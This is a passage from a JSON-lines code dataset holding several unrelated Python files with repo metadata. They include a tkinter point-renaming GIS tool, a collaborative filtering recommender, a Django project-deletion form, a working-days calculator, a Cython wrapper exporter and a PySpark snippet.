file_filter, recursive=True )\n return files\n\n # Update the confg file with the new path variables\n def save_config_vars( self ):\n # Update the config parameters\n config.set( 'path', 'csv', self.csv_path.get() )\n config.set( 'path', 'asbuilt', self.asbuilt_path.get() )\n config.set( 'path', 'output', self.output_path.get() )\n # save the new config parameters to path.ini file\n with open('path.ini', 'w') as configfile:\n config.write(configfile)\n \n # returns an asbuilt dataframe. Spatial join asbuilt with merged csv dataframe using inner method. \n def join_dataframe( self, df_csv, df_asbuilt ):\n # create geopandas from dataframe as point layer with Irish CRS. \n # Point type geodataframe: gdf_csv\n gdf_csv = gpd.GeoDataFrame(\n df_csv, geometry=gpd.points_from_xy(df_csv['Easting'], df_csv['Northing']), crs=\"EPSG:2157\")\n # Point type geodataframe: gdf_asbuilt\n gdf_asbuilt = gpd.GeoDataFrame(\n df_asbuilt, geometry=gpd.points_from_xy(df_asbuilt['Easting'], df_asbuilt['Northing']), crs=\"EPSG:2157\")\n # Spatial join asbuilt with merged csv dataframe using inner method. \n # An asbuilt data spatially joins with the merged csv dataframe. \n # It compares spatial index from point to point. \n joindef_asbuilt = gdf_asbuilt.sjoin(gdf_csv, how=\"left\")\n return joindef_asbuilt\n\n # This function gets merged csv dataframe. Creates asbuilt dataframe from pts file. \n # Process the asbuilt dataframe with merged dataframe using spatial join. \n # Updates Point_Name column from merged dataframe. Then exports it to a pts file.\n def process_data( self, asbuilt_file ):\n # save config variables when clicking Process button\n self.save_config_vars()\n # column names for both dataframes\n column_names = [\"Point_Name\", \"Easting\", \"Northing\", \"Elevation\", \"Point Code\"]\n # csf folder\n csv_path = self.csv_path.get()\n # merge all csv dataframes to one\n df_csv = self.merge_csv( csv_path, column_names )\n # asbuilt dataframe\n df_asbuilt = pd.read_csv( asbuilt_file, names=column_names, sep='\\t' )\n # extract file name without extention from the file path. It will be used for asbuilt file path\n file_name = Path( asbuilt_file ).stem\n # additional info: export it to gpkg file to see on QGIS\n # joindef_asbuilt.to_file(self.output_path.get() + \"\\\\\" + file_name + \".gpkg\", driver=\"GPKG\")\n joindef_asbuilt = self.join_dataframe( df_csv, df_asbuilt )\n # rename the column names\n joindef_asbuilt.rename(columns = {'Point_Name_right':'Point_Name','Easting_right':'Easting', 'Northing_right':'Northing', 'Elevation_right':'Elevation', 'Point Code_right':'Point_Code'}, inplace = True)\n # select specific columns and copy them to a new dataframe\n joindef_asbuilt = joindef_asbuilt[['Point_Name', 'Easting', 'Northing', 'Elevation', 'Point_Code']].copy()\n # output pts file name\n output_file_name = self.output_path.get() + \"\\\\\" + file_name + \".pts\"\n # Export the dataframe to csv. na_rep=\"\" : Fill the Nan values with spaces, disable index, include header\n joindef_asbuilt.to_csv(output_file_name, sep='\\t', encoding='utf-8', na_rep=\"\", index=False, header=True)\n\n # this function gets all asbuilt pts file paths to a list. \n # Then iterates per file to process with process_data(dir_path) function\n def asbuilt_output(self):\n asbuilt_list = self.find_asbuilts( self.asbuilt_path.get() )\n for i in asbuilt_list:\n self.process_data( i )\n\n def folder_path_csv(self):\n folder = tk.filedialog.askdirectory()\n if folder:\n self.csv_path_input.set(folder)\n\n def folder_path_asbuilt(self):\n folder = tk.filedialog.askdirectory()\n if folder:\n self.asbuilt_path_input.set(folder)\n\n def folder_path_output(self):\n folder = tk.filedialog.askdirectory()\n if folder:\n self.output_path_input.set(folder)\n\n def setup_widgets(self):\n # pady is vertical space, padx is horizontal space of the widget.\n # Create a Frame for input widgets\n self.widgets_frame = ttk.LabelFrame(self, text=\"Select Folders\", padding=(10, 10, 10, 10))\n self.widgets_frame.grid(\n row=0, column=1, padx=20, pady=(20), sticky=\"nsew\", rowspan=3\n )\n self.widgets_frame.columnconfigure(index=1, weight=1)\n # CSV File Folder\n # Label1\n self.label1 = ttk.Label(self.widgets_frame, text=\"CSV Folder\")\n self.label1.grid(row=1, column=0, padx=5, pady=10, sticky=\"nsew\")\n # Readonly text1\n self.csv_path_input = tk.StringVar()\n self.csv_path = ttk.Entry(self.widgets_frame, textvariable=self.csv_path_input, state=tk.DISABLED)\n self.csv_path.grid(row=1, column=1, padx=5, pady=10, sticky=\"nsew\")\n # Button1\n self.button1 = ttk.Button(self.widgets_frame, text=\"...\", command=self.folder_path_csv)\n self.button1.grid(row=1, column=2, padx=5, pady=10, sticky=\"nsew\")\n # PVS File Folder\n # Label2\n self.label2 = ttk.Label(self.widgets_frame, text=\"As-Built Folder\")\n self.label2.grid(row=2, column=0, padx=5, pady=10, sticky=\"nsew\")\n # Readonly text2\n self.asbuilt_path_input = tk.StringVar()\n self.asbuilt_path = ttk.Entry(self.widgets_frame, textvariable=self.asbuilt_path_input, state=tk.DISABLED)\n self.asbuilt_path.grid(row=2, column=1, padx=5, pady=10, sticky=\"nsew\")\n # Button2\n self.button2 = ttk.Button(self.widgets_frame, text=\"...\", command=self.folder_path_asbuilt)\n self.button2.grid(row=2, column=2, padx=5, pady=10, sticky=\"nsew\")\n # Output Folder\n # Label3\n self.label3 = ttk.Label(self.widgets_frame, text=\"Output Folder\")\n self.label3.grid(row=3, column=0, padx=5, pady=10, sticky=\"nsew\")\n # Readonly text3\n self.output_path_input = tk.StringVar()\n self.output_path = ttk.Entry(self.widgets_frame, textvariable=self.output_path_input, state=tk.DISABLED)\n self.output_path.grid(row=3, column=1, padx=5, pady=10, sticky=\"nsew\")\n # Button3\n self.button3 = ttk.Button(self.widgets_frame, text=\"...\", command=self.folder_path_output)\n self.button3.grid(row=3, column=2, padx=5, pady=10, sticky=\"nsew\")\n # Process Button\n self.button4 = ttk.Button(self.widgets_frame, text=\"Process\", command=self.asbuilt_output)\n self.button4.grid(row=4, column=1, padx=5, pady=10, sticky=\"nsew\")\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n root.title(\"Point Name Fixer\")\n # set the theme\n sv_ttk.set_theme(\"light\")\n app = App(root)\n app.pack(fill=\"both\", expand=True)\n # Set a minsize for the window, and place it in the middle\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n x_cordinate = int((root.winfo_screenwidth() / 2) - (root.winfo_width() / 2))\n y_cordinate = int((root.winfo_screenheight() / 2) - (root.winfo_height() / 2))\n root.geometry(\"+{}+{}\".format(x_cordinate, y_cordinate))\n root.mainloop()\n","repo_name":"edips/PointNameFixer","sub_path":"PointNameFixer.py","file_name":"PointNameFixer.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6792498930","text":"import numpy as np\r\nfrom numpy.linalg import norm\r\nimport time\r\n\r\n\r\nclass UserBasedCF(object):\r\n def __init__(self):\r\n self.rec_score = None\r\n self.C_ = None\r\n self.norms_ = None\r\n\r\n def load_result(self, path):\r\n ctime = time.time()\r\n print(\"Loading result...\",)\r\n self.rec_score = np.load(path + \"rec_score.npy\")\r\n print(\"Done. Elapsed time:\", time.time() - ctime, \"s\")\r\n\r\n def save_result(self, path):\r\n ctime = time.time()\r\n print(\"Saving result...\",)\r\n np.save(path + \"rec_score\", self.rec_score)\r\n print(\"Done. Elapsed time:\", time.time() - ctime, \"s\")\r\n\r\n def pre_compute_rec_scores(self, C):\r\n ctime = time.time()\r\n self.C_ = C\r\n print(\"Training User-based Collaborative Filtering...\",C.shape )\r\n\r\n sim = C.dot(C.T)\r\n norms = np.array([norm(C[i]) for i in range(C.shape[0])])\r\n self.norms_ = norms\r\n sim = sim/(norms.reshape((-1,1)) * norms.reshape((1,-1)))\r\n np.fill_diagonal(sim,0.0)\r\n self.rec_score = sim.dot(C)\r\n print(\"Done. Elapsed time:\", time.time() - ctime, \"s\")\r\n\r\n def predict_user(self, X):\r\n ctime = time.perf_counter()\r\n sim = X.dot(self.C_.T)\r\n print(\"S:\",sim.shape)\r\n norms = np.array([norm(X[i]) for i in range(X.shape[0])])\r\n boo = (norms.reshape((-1,1)) * self.norms_.reshape((1,-1)))\r\n print(boo.shape)\r\n sim = sim/boo\r\n np.fill_diagonal(sim,0.0)\r\n rec_score = sim.dot(self.C_)\r\n print(\"Done. Elapsed time:\", time.perf_counter() - ctime, \"s\",rec_score)\r\n return rec_score\r\n\r\n def predict(self, i, j):\r\n return self.rec_score[i][j]\r\n","repo_name":"SamimaAktar/Where-to-go-spl3","sub_path":"UserBasedCF.py","file_name":"UserBasedCF.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"72357390589","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom web import models\nfrom utils.tencent.cos import delete_bucket\n\n\nclass ProjectDeleteModelForm(forms.ModelForm):\n\n class Meta:\n model = models.Project\n fields = ['name', ]\n\n def __init__(self, request, *args, **kwargs):\n self.request = request\n super().__init__(*args, **kwargs)\n for name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n field.widget.attrs['placeholder'] = f'请输入{field.label}'\n\n def clean_name(self):\n name = self.cleaned_data.get('name')\n if name != self.request.project.name:\n raise ValidationError('请输入本项目的名称')\n project_object = models.Project.objects.filter(name=name, id=self.request.project.id).first()\n if project_object:\n if self.request.tracer == project_object.creator:\n delete_bucket(self.request.project.bucket, self.request.project.region)\n project_object.delete()\n return name\n raise ValidationError('只有项目创建者才可以删除项目')\n raise ValidationError('请输入正确的项目名称')\n","repo_name":"MrXck/SAAS","sub_path":"web/forms/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40467247906","text":"#\nfrom calendar import month\nimport sys\nfrom collections import deque\nfrom bisect import bisect_left\nfrom bisect import bisect_right\ndef check_leap_year(year):\n if year % 400 == 0:\n return 1\n if year % 4 == 0 and year % 100 != 0:\n return 1\n return 0\n \ndef cal_days(start_day, end_day):\n \n year = [[365,31,28,31,30,31,30,31,31,30,31,30,31],[366,31,29,31,30,31,30,31,31,30,31,30,31]]\n days = 0\n \n start_year, start_month, start_days = start_day\n end_year, end_month, end_days = end_day\n \n \n if start_year == end_year:# 근무 년도와 퇴직 연도가 같을 때\n month_temp = year[check_leap_year(start_year)]\n if start_month == end_month: # 달이 같은 경우\n days += end_days - start_days + 1\n return days\n \n days += month_temp[start_month] - start_days + 1\n for m in range(start_month + 1, end_month):\n days += month_temp[m]\n days += end_days\n \n else:# 근무 년도와 퇴직 연도가 다를 때\n # 근무 시작 해 계산\n month_temp = year[check_leap_year(start_year)]\n days += month_temp[start_month] - start_days + 1\n for m in range(start_month + 1, 13):\n days += month_temp[m]\n \n # 중간 해 계산\n for y in range(start_year + 1, end_year):\n days += year[check_leap_year(y)][0]\n \n # 근무 마지막 해 계산\n month_temp = year[check_leap_year(end_year)]\n for m in range(1, end_month):\n days += month_temp[m]\n days += end_days\n \n return days\n\ndef not_weekend_hol(holidays, start_day, end_day, date):\n holidays.sort()\n result = 0\n s_idx = bisect_left(holidays, start_day)\n e_idx = bisect_right(holidays, end_day)\n\n holidays = holidays[s_idx:e_idx]\n \n for h in holidays:\n days = cal_days(start_day, h)\n if date[(days - 1) % 7] == 'SAT' or date[(days - 1) % 7] == 'SUN':\n continue\n else:\n result += 1\n \n return result\n\ndef solution(join_date, resign_date, holidays):\n\n result = 0\n holidays_list = []\n \n date = deque(['MON','TUE', 'WED','THU','FRI','SAT','SUN'])\n temp = deque([])\n \n join_date_day, join_date_date = map(str, join_date.split())\n join_date_day = list(map(int, join_date_day.split('/')))\n resign_date_day = list(map(int,resign_date.split('/')))\n\n # 공휴일\n for y in range(join_date_day[0], resign_date_day[0] + 1):\n for h in holidays:\n h_month, h_day = map(int, h.split('/'))\n holidays_list.append([y,h_month,h_day])\n \n # 요일\n while join_date_date != date[0]:\n temp_date = date.popleft()\n temp.append(temp_date)\n \n while temp:\n temp_date = temp.popleft()\n date.append(temp_date)\n date = list(date)\n \n total_days = cal_days(join_date_day,resign_date_day)\n\n sun_or_sat_days = (total_days-1) // 7 * 2\n cnt = 0\n if 'SAT' in date[:(total_days - 1) % 7 + 1]:\n cnt += 1\n if 'SUN' in date[:(total_days - 1) % 7 + 1]:\n cnt += 1\n \n total_holidays = not_weekend_hol(holidays_list, join_date_day, resign_date_day,date)\n \n return total_days - sun_or_sat_days - total_holidays - cnt\n \n \nif __name__ == '__main__':\n join_date = ['2020/1/5 TUE','2019/12/01 SUN', '2019/12/01 SUN', '2019/11/21 THU']\n resign_date = ['2024/03/20','2019/12/31', '2020/03/02','2019/11/21']\n holidays = [['5/5', '12/25', '3/1'],['12/25'],['01/02','12/24','03/01'],['12/23']]\n for p,r,h in zip(join_date, resign_date, holidays):\n print(solution(p,r,h))","repo_name":"Cho-El/coding-test-practice","sub_path":"프로그래머스 문제/파이썬/2022 쿠키런서버개발자인턴/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21690367217","text":"from typing import Union, Iterable\n\nimport cv2\nimport numpy as np\n\nfrom mpa.utils.logger import get_logger\n\nlogger = get_logger()\n\n\ndef get_cls_img_indices(labels, dataset):\n img_indices = {label.name: list() for label in labels}\n for i, item in enumerate(dataset):\n item_labels = item.annotation_scene.get_labels()\n for i_l in item_labels:\n img_indices[i_l.name].append(i)\n\n return img_indices\n\n\ndef get_old_new_img_indices(labels, new_classes, dataset):\n ids_old, ids_new = [], []\n _dataset_label_schema_map = {label.name: label for label in labels}\n new_classes = [_dataset_label_schema_map[new_class] for new_class in new_classes]\n for i, item in enumerate(dataset):\n if item.annotation_scene.contains_any(new_classes):\n ids_new.append(i)\n else:\n ids_old.append(i)\n return {'old': ids_old, 'new': ids_new}\n\n\ndef get_actmap(saliency_map: Union[np.ndarray, Iterable, int, float], \n output_res: Union[tuple, list]):\n saliency_map = cv2.resize(saliency_map, output_res)\n saliency_map = cv2.applyColorMap(saliency_map, cv2.COLORMAP_JET)\n saliency_map = cv2.cvtColor(saliency_map, cv2.COLOR_BGR2RGB)\n return saliency_map\n","repo_name":"mhasa004/training_extensions","sub_path":"external/model-preparation-algorithm/mpa_tasks/utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"36650745734","text":"import warnings\nfrom functools import partial\nfrom itertools import chain\nfrom abc import ABCMeta, abstractmethod\n\nfrom . import templates\nfrom .ast import Constructor\nfrom .parser import Includes, TypeInfo\nfrom .defaultconfig import Config\nfrom .template_specialization import (ClassSpecializer, FunctionSpecializer,\n MethodSpecializer)\nfrom .templates import render\nfrom .type_conversion import create_type_converter\nfrom .utils import from_camel_case, replace_keyword_argnames\n\n\nclass AstExporter(object):\n \"\"\"Base class of AST exporters.\n\n An AST exporter converts elements of an AST to a single string. This\n is an implementation of the visitor pattern to avoid duplication in the\n code that walks through the AST.\n \"\"\"\n __metaclass__ = ABCMeta\n def __init__(self):\n self.typedefs = []\n self.enums = []\n self.functions = []\n self.classes = []\n self.arguments = []\n self._clear_class()\n\n self.output = None\n\n def _clear_class(self):\n \"\"\"Set collected class members to empty list.\"\"\"\n self.fields = []\n self.ctors = []\n self.methods = []\n\n def export(self):\n \"\"\"Export generated string.\n\n Returns\n -------\n output : str\n Generated output\n \"\"\"\n return self.output\n\n @abstractmethod\n def visit_ast(self, ast):\n \"\"\"Visit AST.\n\n Parameters\n ----------\n ast : AST\n Abstract syntax tree\n \"\"\"\n\n @abstractmethod\n def visit_enum(self, enum):\n \"\"\"Visit enum.\n\n Parameters\n ----------\n enum : Enum\n Enumeration\n \"\"\"\n\n @abstractmethod\n def visit_typedef(self, typedef):\n \"\"\"Visit typedef.\n\n Parameters\n ----------\n typedef : Typedef\n Type definition\n \"\"\"\n\n @abstractmethod\n def visit_clazz(self, clazz):\n \"\"\"Visit class.\n\n Parameters\n ----------\n clazz : Clazz\n Custom class\n \"\"\"\n\n @abstractmethod\n def visit_field(self, field):\n \"\"\"Visit field.\n\n Parameters\n ----------\n field : Field\n Field, data member of a class\n \"\"\"\n\n @abstractmethod\n def visit_constructor(self, ctor):\n \"\"\"Visit constructor.\n\n Parameters\n ----------\n ctor : Constructor\n Class constructor\n \"\"\"\n\n @abstractmethod\n def visit_template_class(self, template_class):\n \"\"\"Visit template class.\n\n Parameters\n ----------\n template_class : TemplateClass\n Template class\n \"\"\"\n\n @abstractmethod\n def visit_method(self, method):\n \"\"\"Visit method.\n\n Parameters\n ----------\n method : Method\n Visit class method\n \"\"\"\n\n @abstractmethod\n def visit_template_method(self, template_method):\n \"\"\"Visit template method.\n\n Parameters\n ----------\n template_method : TemplateMethod\n Template method that defines its own template type(s)\n \"\"\"\n\n @abstractmethod\n def visit_function(self, function):\n \"\"\"Visit function.\n\n Parameters\n ----------\n function : Function\n Function that does not belong to a class\n \"\"\"\n\n @abstractmethod\n def visit_template_function(self, template_function):\n \"\"\"Visit template function.\n\n Parameters\n ----------\n template_function : TemplateFunction\n Template function\n \"\"\"\n\n @abstractmethod\n def visit_param(self, param):\n \"\"\"Visit function parameter.\n\n Parameters\n ----------\n param : Param\n A parameter of a constructor, method, or function\n \"\"\"\n\n\nclass CythonDeclarationExporter(AstExporter):\n \"\"\"Export to Cython declaration file (.pxd).\n\n Parameters\n ----------\n includes : Includes, optional\n Collects information about required import statements from the exporter\n\n config : Config, optional\n Configuration that controls e.g. template specializations\n \"\"\"\n def __init__(self, includes=Includes(), config=Config()):\n super(CythonDeclarationExporter, self).__init__()\n self.includes = includes\n self.config = config\n\n def visit_ast(self, ast):\n self.output = render(\"declarations\", typedefs=self.typedefs,\n enums=self.enums, functions=self.functions,\n classes=self.classes)\n\n def visit_enum(self, enum):\n self.enums.append(render(\"enum_decl\", enum=enum))\n\n def visit_typedef(self, typedef):\n self.typedefs.append(templates.typedef_decl % typedef.__dict__)\n\n def visit_clazz(self, clazz):\n self._visit_class(clazz)\n\n def visit_template_class(self, template_class):\n name = \"%s[%s]\" % (template_class.name,\n \", \".join(template_class.template_types))\n self._visit_class(template_class, {\"name\": name})\n\n def _visit_class(self, clazz, additional_args=None):\n if not clazz.ignored:\n class_decl = {}\n class_decl.update(clazz.__dict__)\n if additional_args is not None:\n class_decl.update(additional_args)\n class_decl[\"fields\"] = self.fields\n class_decl[\"ctors\"] = self.ctors\n class_decl[\"methods\"] = self.methods\n class_decl[\"empty_body\"] = (len(self.fields) + len(self.methods) +\n len(self.ctors) == 0)\n\n self.classes.append(render(\"class_decl\", **class_decl))\n self._clear_class()\n\n def visit_field(self, field):\n if not field.ignored:\n self.fields.append(templates.field_decl % field.__dict__)\n\n def visit_constructor(self, ctor):\n if not ctor.ignored:\n const_dict = {\"args\": \", \".join(self.arguments)}\n const_dict.update(ctor.__dict__)\n const_str = templates.constructor_decl % const_dict\n self.ctors.append(const_str)\n self.arguments = []\n\n def visit_method(self, method):\n self._visit_method(method, templates.method_decl)\n\n def visit_template_method(self, template_method):\n self._visit_method(\n template_method, templates.template_method_decl,\n {\"types\": \", \".join(template_method.template_types)})\n\n def _visit_method(self, method, template, additional_args=None):\n if not method.ignored:\n method_dict = {\"args\": \", \".join(self.arguments)}\n method_dict.update(method.__dict__)\n if additional_args is not None:\n method_dict.update(additional_args)\n method_dict[\"name\"] = replace_operator_decl(\n method_dict[\"name\"], self.config)\n method_str = template % method_dict\n method_str += self._exception_suffix(method.result_type)\n self.methods.append(method_str)\n self.arguments = []\n\n def visit_function(self, function):\n if not function.ignored:\n function_dict = {\"args\": \", \".join(self.arguments)}\n function_dict.update(function.__dict__)\n function_str = templates.function_decl % function_dict\n function_str += self._exception_suffix(function.result_type)\n self.functions.append(function_str)\n self.arguments = []\n\n def visit_template_function(self, template_function):\n if not template_function.ignored:\n function_dict = {\n \"args\": \", \".join(self.arguments),\n \"types\": \", \".join(template_function.template_types)}\n function_dict.update(template_function.__dict__)\n function_str = templates.template_function_decl % function_dict\n function_str += self._exception_suffix(\n template_function.result_type)\n self.functions.append(function_str)\n self.arguments = []\n\n def visit_param(self, param):\n param_dict = param.__dict__\n param_dict[\"name\"] = replace_keyword_argnames(param.name)\n self.arguments.append(templates.arg_decl % param_dict)\n\n def _exception_suffix(self, result_type):\n \"\"\"Workaround for bug in Cython when returning C arrays.\"\"\"\n if result_type == \"char *\":\n return \"\"\n else:\n return \" except +\"\n\n\ndef replace_operator_decl(method_name, config):\n if method_name in config.call_operators:\n return \"%s \\\"%s\\\"\" % (config.call_operators[method_name], method_name)\n else:\n return method_name\n\n\nclass CythonImplementationExporter(AstExporter):\n \"\"\"Export to Cython implementation file (.pyx).\n\n Parameters\n ----------\n includes : Includes, optional\n Collects information about required import statements from the exporter\n\n type_info : TypeInfo, optional\n Contains names of custom C++ types that have been defined in the code\n\n config : Config, optional\n Configuration that controls e.g. template specializations\n \"\"\"\n def __init__(self, includes=Includes(), type_info=TypeInfo(),\n config=Config()):\n super(CythonImplementationExporter, self).__init__()\n self.includes = includes\n self.type_info = type_info\n self.config = config\n\n def visit_ast(self, ast):\n self.output = render(\"definitions\", enums=self.enums,\n functions=self.functions, classes=self.classes)\n\n def visit_enum(self, enum):\n self.enums.append(render(\"enum\", enum=enum))\n\n def visit_typedef(self, typedef):\n pass\n\n def visit_clazz(self, clazz, cppname=None):\n if self.config.is_ignored_class(clazz.filename, clazz.name):\n warnings.warn(\"Class '%s' from file '%s' is on the blacklist and \"\n \"will be ignored.\" % (clazz.name, clazz.filename))\n clazz.ignored = True\n self._clear_class()\n return\n\n if len(self.ctors) > 1:\n msg = (\"Class '%s' has more than one constructor. This is not \"\n \"compatible to Python. The last constructor will overwrite \"\n \"all others.\" % clazz.name)\n warnings.warn(msg)\n elif len(self.ctors) == 0:\n self.ctors.append(Constructor(clazz.name, \"\"))\n if cppname is None:\n cppname = clazz.name\n\n try:\n self.type_info.attach_specialization(clazz.get_attached_typeinfo())\n class_def = {}\n class_def.update(clazz.__dict__)\n class_def[\"cppname\"] = cppname\n class_def[\"comment\"] = clazz.comment\n class_def[\"fields\"] = map(partial(\n self._process_field, selftype=clazz.name), self.fields)\n class_def[\"ctors\"] = map(partial(\n self._process_constructor, selftype=clazz.name,\n cpptype=clazz.get_cppname()), self.ctors)\n class_def[\"methods\"] = map(partial(\n self._process_method, selftype=clazz.name), self.methods)\n finally:\n self.type_info.remove_specialization()\n\n self.classes.append(render(\"class\", **class_def))\n self._clear_class()\n\n def visit_template_class(self, template_class):\n specializer = ClassSpecializer(self.config)\n for clazz in specializer.specialize(template_class):\n self.visit_clazz(clazz, cppname=clazz.get_cppname())\n\n def visit_field(self, field):\n self.fields.append(field)\n\n def _process_field(self, field, selftype):\n try:\n setter_def = SetterDefinition(\n selftype, field, self.includes, self.type_info,\n self.config).make()\n getter_def = GetterDefinition(\n selftype, field, self.includes, self.type_info,\n self.config).make()\n return {\n \"name\": from_camel_case(field.name),\n \"getter\": getter_def,\n \"setter\": setter_def\n }\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring field '%s'\" % field.name)\n field.ignored = True\n return {}\n\n def visit_constructor(self, ctor):\n self.ctors.append(ctor)\n\n def _process_constructor(self, ctor, selftype, cpptype):\n if self.config.is_abstract_class(ctor.class_name):\n warnings.warn(\"Class '%s' is abstract and will have no constructor.\"\n % ctor.class_name)\n ctor.ignored = True\n return \"\"\n\n try:\n constructor_def = ConstructorDefinition(\n selftype, ctor.comment, ctor.nodes, self.includes,\n self.type_info, self.config, cpptype)\n return constructor_def.make()\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring method '%s'\" % ctor.name)\n ctor.ignored = True\n return \"\"\n\n def visit_method(self, method, cppname=None):\n if self.config.is_ignored_method(method.class_name, method.name):\n warnings.warn(\"Method '%s::%s' is on the blacklist and will be \"\n \"ignored.\" % (method.class_name, method.name))\n method.ignored = True\n return\n\n self.methods.append((method, cppname))\n\n def _process_method(self, arg, selftype):\n method, cppname = arg\n try:\n method_def = MethodDefinition(\n selftype, method.comment, method.name, method.nodes,\n self.includes, method.result_type, self.type_info, self.config,\n cppname=cppname)\n return method_def.make()\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring method '%s'\" % method.name)\n method.ignored = True\n return \"\"\n\n def visit_template_method(self, template_method):\n specializer = MethodSpecializer(self.config)\n for method in specializer.specialize(template_method):\n self.visit_method(method, cppname=template_method.name)\n\n def visit_function(self, function, cppname=None):\n try:\n self.functions.append(FunctionDefinition(\n function.name, function.comment, function.nodes, self.includes,\n function.result_type, self.type_info,\n self.config, cppname=cppname).make())\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring function '%s'\" % function.name)\n function.ignored = True\n\n def visit_template_function(self, template_function):\n specializer = FunctionSpecializer(self.config)\n for method in specializer.specialize(template_function):\n self.visit_function(method, cppname=template_function.name)\n\n def visit_param(self, param):\n pass\n\n\nclass FunctionDefinition(object):\n def __init__(self, name, comment, arguments, includes, result_type,\n type_info, config, cppname=None):\n self.name = name\n self.comment = comment\n self.arguments = arguments\n self.includes = includes\n self.initial_args = []\n self.result_type = result_type\n self.type_info = type_info\n self.config = config\n if cppname is None:\n self.cppname = self.name\n else:\n self.cppname = cppname\n self.output_is_copy = True\n self._create_type_converters()\n\n def _create_type_converters(self):\n skip = 0\n self.type_converters = []\n for i, arg in enumerate(self.arguments):\n if skip > 0:\n skip -= 1\n continue\n type_converter = create_type_converter(\n arg.tipe, arg.name, self.type_info, self.config,\n (self.arguments, i))\n type_converter.add_includes(self.includes)\n self.type_converters.append(type_converter)\n skip = type_converter.n_cpp_args() - 1\n self.output_type_converter = create_type_converter(\n self.result_type, None, self.type_info, self.config)\n self.output_type_converter.add_includes(self.includes)\n\n def make(self):\n function = self._signature()\n function[\"input_conversions\"] = self._input_type_conversions()\n function[\"call\"] = self._call_cpp_function(self._call_args())\n function[\"return_output\"] = self.output_type_converter.return_output(\n self.output_is_copy)\n function[\"comment\"] = self.comment\n return render(\"function\", **function)\n\n def _signature(self):\n function_name = from_camel_case(\n self.config.cpp_to_py_operator(self.name))\n return {\"def_prefix\": self._def_prefix(function_name),\n \"args\": \", \".join(self._cython_signature_args()),\n \"name\": function_name}\n\n def _def_prefix(self, function_name):\n special_method = (function_name.startswith(\"__\") and\n function_name.endswith(\"__\"))\n if special_method:\n return \"def\"\n else:\n return \"cpdef\"\n\n def _cython_signature_args(self):\n return self.initial_args + [tc.python_type_decl()\n for tc in self.type_converters]\n\n def _input_type_conversions(self):\n return [tc.python_to_cpp() for tc in self.type_converters]\n\n def _call_args(self):\n return list(chain.from_iterable(\n tc.cpp_call_args() for tc in self.type_converters))\n\n def _call_cpp_function(self, call_args):\n call = templates.fun_call % {\"name\": self.cppname,\n \"call_args\": \", \".join(call_args)}\n return catch_result(self.output_type_converter.cpp_type_decl(), call)\n\n\nclass ConstructorDefinition(FunctionDefinition):\n def __init__(self, class_name, comment, arguments, includes, type_info,\n config, cpp_classname):\n super(ConstructorDefinition, self).__init__(\n \"__init__\", comment, arguments, includes, result_type=None,\n type_info=type_info, config=config)\n self.initial_args = [\"%s self\" % class_name]\n self.cpp_classname = cpp_classname\n\n def _call_cpp_function(self, call_args):\n return templates.ctor_call % {\"class_name\": self.cpp_classname,\n \"call_args\": \", \".join(call_args)}\n\n\nclass MethodDefinition(FunctionDefinition):\n def __init__(self, class_name, comment, name, arguments, includes,\n result_type, type_info, config, cppname=None):\n super(MethodDefinition, self).__init__(\n name, comment, arguments, includes, result_type, type_info, config, cppname)\n self.initial_args = [\"%s self\" % class_name]\n\n def _call_cpp_function(self, call_args):\n call = templates.method_call % {\n \"name\": self.config.call_operators.get(self.cppname, self.cppname),\n \"call_args\": \", \".join(call_args)}\n return catch_result(self.output_type_converter.cpp_type_decl(), call)\n\n\nclass SetterDefinition(MethodDefinition):\n def __init__(self, python_classname, field, includes, type_info, config):\n name = \"__set_%s\" % field.name\n super(SetterDefinition, self).__init__(\n python_classname, \"\", name, [field], includes, \"void\", type_info,\n config)\n self.field_name = field.name\n\n def _call_cpp_function(self, call_args):\n assert len(call_args) == 1\n return templates.setter_call % {\"name\": self.field_name,\n \"call_args\": call_args[0]}\n\n\nclass GetterDefinition(MethodDefinition):\n def __init__(self, python_classname, field, includes, type_info, config):\n name = \"__get_%s\" % field.name\n super(GetterDefinition, self).__init__(\n python_classname, \"\", name, [], includes, field.tipe, type_info,\n config)\n self.output_is_copy = False\n self.field_name = field.name\n\n def _call_cpp_function(self, call_args):\n assert len(call_args) == 0\n call = templates.getter_call % {\"name\": self.field_name}\n return catch_result(self.output_type_converter.cpp_type_decl(), call)\n\n\ndef catch_result(result_type_decl, call):\n if result_type_decl == \"\":\n return call\n else:\n return templates.catch_result % {\"cpp_type_decl\": result_type_decl,\n \"call\": call}\n","repo_name":"AlexanderFabisch/cythonwrapper","sub_path":"pywrap/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":20580,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"6"} +{"seq_id":"70983298747","text":"import argparse\n\nfrom pyspark import SQLContext, SparkConf, SparkContext\nfrom pyspark.sql.functions import isnull\n\n'''\n@需求:\n\n处理来自HDFS的json文件,统计各个字段的空值百分比/数量\n\n'''\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Process Data to new Hive Table\")\n parser.add_argument(\"-path\", help=\"input file path\")\n parser.add_argument(\"-output\", help=\"output file path\")\n args = parser.parse_args()\n\n conf = SparkConf().setAppName(\"pyspark-json\") #connect to spark\n sc = SparkContext(conf=conf)\n sqlContext = SQLContext(sc)\n input_path=args.path #'hdfs://nameservice1/user/hiddenstrawberry/test.json'\n 